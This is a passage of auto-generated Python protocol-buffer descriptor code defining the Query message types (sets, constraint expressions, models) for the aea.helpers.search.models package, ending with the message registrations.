serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="double",
full_name="aea.helpers.search.models.Query.Set.Values.double",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="boolean",
full_name="aea.helpers.search.models.Query.Set.Values.boolean",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="integer",
full_name="aea.helpers.search.models.Query.Set.Values.integer",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="location",
full_name="aea.helpers.search.models.Query.Set.Values.location",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_QUERY_SET_VALUES_INTS,
_QUERY_SET_VALUES_DOUBLES,
_QUERY_SET_VALUES_STRINGS,
_QUERY_SET_VALUES_BOOLS,
_QUERY_SET_VALUES_LOCATIONS,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.Values.values",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=1752,
serialized_end=2301,
)
_QUERY_SET = _descriptor.Descriptor(
name="Set",
full_name="aea.helpers.search.models.Query.Set",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="operator",
full_name="aea.helpers.search.models.Query.Set.operator",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="values",
full_name="aea.helpers.search.models.Query.Set.values",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_QUERY_SET_VALUES,],
enum_types=[_QUERY_SET_OPERATOR,],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1618,
serialized_end=2332,
)
_QUERY_CONSTRAINTEXPR_OR = _descriptor.Descriptor(
name="Or",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Or",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Or.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2640,
serialized_end=2713,
)
_QUERY_CONSTRAINTEXPR_AND = _descriptor.Descriptor(
name="And",
full_name="aea.helpers.search.models.Query.ConstraintExpr.And",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.And.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2715,
serialized_end=2789,
)
_QUERY_CONSTRAINTEXPR_NOT = _descriptor.Descriptor(
name="Not",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Not",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Not.expression",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2791,
serialized_end=2865,
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT = _descriptor.Descriptor(
name="Constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="attribute_name",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.attribute_name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="set_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.set_",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="range_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.range_",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="relation",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.relation",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="distance",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.distance",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.Constraint.constraint",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=2868,
serialized_end=3156,
)
_QUERY_CONSTRAINTEXPR = _descriptor.Descriptor(
name="ConstraintExpr",
full_name="aea.helpers.search.models.Query.ConstraintExpr",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="or_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.or_",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="and_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.and_",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="not_",
full_name="aea.helpers.search.models.Query.ConstraintExpr.not_",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="constraint",
full_name="aea.helpers.search.models.Query.ConstraintExpr.constraint",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_QUERY_CONSTRAINTEXPR_OR,
_QUERY_CONSTRAINTEXPR_AND,
_QUERY_CONSTRAINTEXPR_NOT,
_QUERY_CONSTRAINTEXPR_CONSTRAINT,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="expression",
full_name="aea.helpers.search.models.Query.ConstraintExpr.expression",
index=0,
containing_type=None,
fields=[],
),
],
serialized_start=2335,
serialized_end=3170,
)
_QUERY_MODEL = _descriptor.Descriptor(
name="Model",
full_name="aea.helpers.search.models.Query.Model",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="constraints",
full_name="aea.helpers.search.models.Query.Model.constraints",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="model",
full_name="aea.helpers.search.models.Query.Model.model",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3173,
serialized_end=3309,
)
_QUERY = _descriptor.Descriptor(
name="Query",
full_name="aea.helpers.search.models.Query",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[],
extensions=[],
nested_types=[
_QUERY_ATTRIBUTE,
_QUERY_DATAMODEL,
_QUERY_LOCATION,
_QUERY_VALUE,
_QUERY_KEYVALUE,
_QUERY_INSTANCE,
_QUERY_STRINGPAIR,
_QUERY_INTPAIR,
_QUERY_DOUBLEPAIR,
_QUERY_LOCATIONPAIR,
_QUERY_RANGE,
_QUERY_DISTANCE,
_QUERY_RELATION,
_QUERY_SET,
_QUERY_CONSTRAINTEXPR,
_QUERY_MODEL,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=44,
serialized_end=3309,
)
_QUERY_ATTRIBUTE.fields_by_name["type"].enum_type = _QUERY_ATTRIBUTE_TYPE
_QUERY_ATTRIBUTE.containing_type = _QUERY
_QUERY_ATTRIBUTE_TYPE.containing_type = _QUERY_ATTRIBUTE
_QUERY_DATAMODEL.fields_by_name["attributes"].message_type = _QUERY_ATTRIBUTE
_QUERY_DATAMODEL.containing_type = _QUERY
_QUERY_LOCATION.containing_type = _QUERY
_QUERY_VALUE.fields_by_name["location"].message_type = _QUERY_LOCATION
_QUERY_VALUE.containing_type = _QUERY
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["string"]
)
_QUERY_VALUE.fields_by_name["string"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["double"]
)
_QUERY_VALUE.fields_by_name["double"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["boolean"]
)
_QUERY_VALUE.fields_by_name["boolean"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["integer"]
)
_QUERY_VALUE.fields_by_name["integer"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_VALUE.oneofs_by_name["value"].fields.append(
_QUERY_VALUE.fields_by_name["location"]
)
_QUERY_VALUE.fields_by_name["location"].containing_oneof = _QUERY_VALUE.oneofs_by_name[
"value"
]
_QUERY_KEYVALUE.fields_by_name["value"].message_type = _QUERY_VALUE
_QUERY_KEYVALUE.containing_type = _QUERY
_QUERY_INSTANCE.fields_by_name["model"].message_type = _QUERY_DATAMODEL
_QUERY_INSTANCE.fields_by_name["values"].message_type = _QUERY_KEYVALUE
_QUERY_INSTANCE.containing_type = _QUERY
_QUERY_STRINGPAIR.containing_type = _QUERY
_QUERY_INTPAIR.containing_type = _QUERY
_QUERY_DOUBLEPAIR.containing_type = _QUERY
_QUERY_LOCATIONPAIR.fields_by_name["first"].message_type = _QUERY_LOCATION
_QUERY_LOCATIONPAIR.fields_by_name["second"].message_type = _QUERY_LOCATION
_QUERY_LOCATIONPAIR.containing_type = _QUERY
_QUERY_RANGE.fields_by_name["string_pair"].message_type = _QUERY_STRINGPAIR
_QUERY_RANGE.fields_by_name["integer_pair"].message_type = _QUERY_INTPAIR
_QUERY_RANGE.fields_by_name["double_pair"].message_type = _QUERY_DOUBLEPAIR
_QUERY_RANGE.fields_by_name["location_pair"].message_type = _QUERY_LOCATIONPAIR
_QUERY_RANGE.containing_type = _QUERY
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["string_pair"]
)
_QUERY_RANGE.fields_by_name[
"string_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["integer_pair"]
)
_QUERY_RANGE.fields_by_name[
"integer_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["double_pair"]
)
_QUERY_RANGE.fields_by_name[
"double_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_RANGE.oneofs_by_name["pair"].fields.append(
_QUERY_RANGE.fields_by_name["location_pair"]
)
_QUERY_RANGE.fields_by_name[
"location_pair"
].containing_oneof = _QUERY_RANGE.oneofs_by_name["pair"]
_QUERY_DISTANCE.fields_by_name["center"].message_type = _QUERY_LOCATION
_QUERY_DISTANCE.containing_type = _QUERY
_QUERY_RELATION.fields_by_name["operator"].enum_type = _QUERY_RELATION_OPERATOR
_QUERY_RELATION.fields_by_name["value"].message_type = _QUERY_VALUE
_QUERY_RELATION.containing_type = _QUERY
_QUERY_RELATION_OPERATOR.containing_type = _QUERY_RELATION
_QUERY_SET_VALUES_INTS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_DOUBLES.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_STRINGS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_BOOLS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES_LOCATIONS.fields_by_name["values"].message_type = _QUERY_LOCATION
_QUERY_SET_VALUES_LOCATIONS.containing_type = _QUERY_SET_VALUES
_QUERY_SET_VALUES.fields_by_name["string"].message_type = _QUERY_SET_VALUES_STRINGS
_QUERY_SET_VALUES.fields_by_name["double"].message_type = _QUERY_SET_VALUES_DOUBLES
_QUERY_SET_VALUES.fields_by_name["boolean"].message_type = _QUERY_SET_VALUES_BOOLS
_QUERY_SET_VALUES.fields_by_name["integer"].message_type = _QUERY_SET_VALUES_INTS
_QUERY_SET_VALUES.fields_by_name["location"].message_type = _QUERY_SET_VALUES_LOCATIONS
_QUERY_SET_VALUES.containing_type = _QUERY_SET
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["string"]
)
_QUERY_SET_VALUES.fields_by_name[
"string"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["double"]
)
_QUERY_SET_VALUES.fields_by_name[
"double"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["boolean"]
)
_QUERY_SET_VALUES.fields_by_name[
"boolean"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["integer"]
)
_QUERY_SET_VALUES.fields_by_name[
"integer"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET_VALUES.oneofs_by_name["values"].fields.append(
_QUERY_SET_VALUES.fields_by_name["location"]
)
_QUERY_SET_VALUES.fields_by_name[
"location"
].containing_oneof = _QUERY_SET_VALUES.oneofs_by_name["values"]
_QUERY_SET.fields_by_name["operator"].enum_type = _QUERY_SET_OPERATOR
_QUERY_SET.fields_by_name["values"].message_type = _QUERY_SET_VALUES
_QUERY_SET.containing_type = _QUERY
_QUERY_SET_OPERATOR.containing_type = _QUERY_SET
_QUERY_CONSTRAINTEXPR_OR.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_OR.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_AND.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_AND.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_NOT.fields_by_name[
"expression"
].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_NOT.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["set_"].message_type = _QUERY_SET
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["range_"].message_type = _QUERY_RANGE
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"relation"
].message_type = _QUERY_RELATION
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"distance"
].message_type = _QUERY_DISTANCE
_QUERY_CONSTRAINTEXPR_CONSTRAINT.containing_type = _QUERY_CONSTRAINTEXPR
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["set_"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"set_"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["range_"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"range_"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["relation"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"relation"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"].fields.append(
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name["distance"]
)
_QUERY_CONSTRAINTEXPR_CONSTRAINT.fields_by_name[
"distance"
].containing_oneof = _QUERY_CONSTRAINTEXPR_CONSTRAINT.oneofs_by_name["constraint"]
_QUERY_CONSTRAINTEXPR.fields_by_name["or_"].message_type = _QUERY_CONSTRAINTEXPR_OR
_QUERY_CONSTRAINTEXPR.fields_by_name["and_"].message_type = _QUERY_CONSTRAINTEXPR_AND
_QUERY_CONSTRAINTEXPR.fields_by_name["not_"].message_type = _QUERY_CONSTRAINTEXPR_NOT
_QUERY_CONSTRAINTEXPR.fields_by_name[
"constraint"
].message_type = _QUERY_CONSTRAINTEXPR_CONSTRAINT
_QUERY_CONSTRAINTEXPR.containing_type = _QUERY
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["or_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"or_"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["and_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"and_"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["not_"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"not_"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"].fields.append(
_QUERY_CONSTRAINTEXPR.fields_by_name["constraint"]
)
_QUERY_CONSTRAINTEXPR.fields_by_name[
"constraint"
].containing_oneof = _QUERY_CONSTRAINTEXPR.oneofs_by_name["expression"]
_QUERY_MODEL.fields_by_name["constraints"].message_type = _QUERY_CONSTRAINTEXPR
_QUERY_MODEL.fields_by_name["model"].message_type = _QUERY_DATAMODEL
_QUERY_MODEL.containing_type = _QUERY
DESCRIPTOR.message_types_by_name["Query"] = _QUERY
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Query = _reflection.GeneratedProtocolMessageType(
"Query",
(_message.Message,),
{
"Attribute": _reflection.GeneratedProtocolMessageType(
"Attribute",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_ATTRIBUTE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Attribute)
},
),
"DataModel": _reflection.GeneratedProtocolMessageType(
"DataModel",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DATAMODEL,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.DataModel)
},
),
"Location": _reflection.GeneratedProtocolMessageType(
"Location",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_LOCATION,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Location)
},
),
"Value": _reflection.GeneratedProtocolMessageType(
"Value",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_VALUE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Value)
},
),
"KeyValue": _reflection.GeneratedProtocolMessageType(
"KeyValue",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_KEYVALUE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.KeyValue)
},
),
"Instance": _reflection.GeneratedProtocolMessageType(
"Instance",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_INSTANCE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Instance)
},
),
"StringPair": _reflection.GeneratedProtocolMessageType(
"StringPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_STRINGPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.StringPair)
},
),
"IntPair": _reflection.GeneratedProtocolMessageType(
"IntPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_INTPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.IntPair)
},
),
"DoublePair": _reflection.GeneratedProtocolMessageType(
"DoublePair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DOUBLEPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.DoublePair)
},
),
"LocationPair": _reflection.GeneratedProtocolMessageType(
"LocationPair",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_LOCATIONPAIR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.LocationPair)
},
),
"Range": _reflection.GeneratedProtocolMessageType(
"Range",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_RANGE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Range)
},
),
"Distance": _reflection.GeneratedProtocolMessageType(
"Distance",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_DISTANCE,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Distance)
},
),
"Relation": _reflection.GeneratedProtocolMessageType(
"Relation",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_RELATION,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Relation)
},
),
"Set": _reflection.GeneratedProtocolMessageType(
"Set",
(_message.Message,),
{
"Values": _reflection.GeneratedProtocolMessageType(
"Values",
(_message.Message,),
{
"Ints": _reflection.GeneratedProtocolMessageType(
"Ints",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_INTS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Ints)
},
),
"Doubles": _reflection.GeneratedProtocolMessageType(
"Doubles",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_DOUBLES,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Doubles)
},
),
"Strings": _reflection.GeneratedProtocolMessageType(
"Strings",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_STRINGS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Strings)
},
),
"Bools": _reflection.GeneratedProtocolMessageType(
"Bools",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_BOOLS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Bools)
},
),
"Locations": _reflection.GeneratedProtocolMessageType(
"Locations",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_SET_VALUES_LOCATIONS,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values.Locations)
},
),
"DESCRIPTOR": _QUERY_SET_VALUES,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set.Values)
},
),
"DESCRIPTOR": _QUERY_SET,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Set)
},
),
"ConstraintExpr": _reflection.GeneratedProtocolMessageType(
"ConstraintExpr",
(_message.Message,),
{
"Or": _reflection.GeneratedProtocolMessageType(
"Or",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_OR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Or)
},
),
"And": _reflection.GeneratedProtocolMessageType(
"And",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_AND,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.And)
},
),
"Not": _reflection.GeneratedProtocolMessageType(
"Not",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_NOT,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Not)
},
),
"Constraint": _reflection.GeneratedProtocolMessageType(
"Constraint",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR_CONSTRAINT,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr.Constraint)
},
),
"DESCRIPTOR": _QUERY_CONSTRAINTEXPR,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.ConstraintExpr)
},
),
"Model": _reflection.GeneratedProtocolMessageType(
"Model",
(_message.Message,),
{
"DESCRIPTOR": _QUERY_MODEL,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query.Model)
},
),
"DESCRIPTOR": _QUERY,
"__module__": "models_pb2"
# @@protoc_insertion_point(class_scope:aea.helpers.search.models.Query)
},
)
_sym_db.RegisterMessage(Query)
_sym_db.RegisterMessage(Query.Attribute)
_sym_db.RegisterMessage(Query.DataModel)
_sym_db.RegisterMessage(Query.Location)
_sym_db.RegisterMessage(Query.Value)
_sym_db.RegisterMessage(Query.KeyValue)
_sym_db.RegisterMessage(Query.Instance)
_sym_db.RegisterMessage(Query.StringPair)
_sym_db.RegisterMessage(Query.IntPair)
_sym_db.RegisterMessage(Query.DoublePair)
_sym_db.RegisterMessage(Query.LocationPair)
_sym_db.RegisterMessage(Query.Range)
_sym_db.RegisterMessage(Query.Distance)
_sym_db.RegisterMessage(Query.Relation)
_sym_db.RegisterMessage(Query.Set)
_sym_db.RegisterMessage(Query.Set.Values)
